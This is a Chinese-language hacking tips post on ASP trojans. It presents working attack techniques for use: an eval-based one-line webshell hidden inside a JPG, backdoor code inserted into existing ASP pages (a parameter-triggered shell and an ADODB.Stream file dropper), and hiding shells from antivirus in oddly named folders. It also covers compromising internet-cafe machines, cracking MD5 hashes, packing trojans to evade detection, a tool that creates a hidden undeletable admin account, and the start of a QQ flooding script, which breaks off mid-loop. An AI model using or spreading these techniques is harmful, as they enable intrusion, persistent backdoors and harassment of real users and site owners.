菜鸟是如何变成ASP木马高手的！

1.名称：如何制作图片ASP木马　　建一个asp文件，内容为<!–＃i nclude file="ating.jpg"–> 　　找一个正常图片ating.jpg，插入一句话木马（比如冰狐的）,用ultraedit进行hex编译，插入图片里，为了运行成功，还要搜索<%和％>,将其变为00,(不要替换自己asp的),再把jpg文件开头加入 　　<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form(\’#\’)+\’\’) </SCRIPT> 　　2. 名称：整蛊网吧 　　先用精锐网吧辅助工具得到用户名和密码，然后用计算机管理联结一台机器，开telnet,连接，开共享， 　　复制一个木马过去运行即可。 　　3．名称：感受MD5暴力破解的魅力 　　rainbowcrack用法先用rtgen生成库 "rtgen md5 byte 1 7 5 2400 40000 all" 　　1和7代表密码最小和最大长度 　　阿汀我再加个方法：http://md5.rednoize.com/ 在线破解 　　或者到http://www.md5lookup.com/?category=01-3&searck=on 　　4.很多时候我们做免杀木马，不用懂汇编，用北斗加壳程序就能逃杀，还有很多加壳软件，大家木马加壳的时候最好多选择不知名的加壳软件 　　5．名称：隐蔽的插入型ASP木马 　　(1)在我们要做手脚的asp文件里加入如下内容 　　<%if request("action")="ok" then%> 　　shell代码插在这里，最好是小马，还要加密一下 　　<%end if%> 　　访问的时候在你作手脚的asp文件后面加上?action=ok,即可 　　(2)另一种方法，在我们要做手脚的asp文件里加入如下内容 　　<% 　　on error resume next 　　strFileName = Request.QueryString("filer") 　　set objStream = Server.createObject("ABODB.Stream") 　　objStream.Type = 1 　　objStream.Open 　　objStream.LoadFromFile strFileName 　　objStream.SaveToFile Server.mappath("ating.asp"),2 　　%> 　　访问的时候在做手脚的asp文件后面加上?filer=XXX 　　XXX为你本地上传的一个路径如 c:ating123.asp 　　上传后在做手脚的asp的同文件夹中有ating,asp 　　（3）前提得到system权限， 　　进入网站目录下一层 　　mkdir s… 　　copy ating.asp s…/ 　　这样杀毒软件找不到的 　　访问http://网站/s…/ating.asp即可 　　6. 工具http://hack520.tengyi.cn/chaojiyonghu.rar，此工具在该电脑生成一个超级用户 　　用户名为：hack 密码110，在DOS下和计算机管理器上看不到你建立的用户，并且是删除不掉的. 　　7．名称：QQ群脚本攻击 　　打开qq对话诓，复制消息，然后 　　下面的内容保存为.vbs 文件，运行即可 　　Set WshShell= WScript.createobject("WScript.Shell") 　　WshShell.AppActivate "QQ信息攻击脚本" 　　for i=1 to 20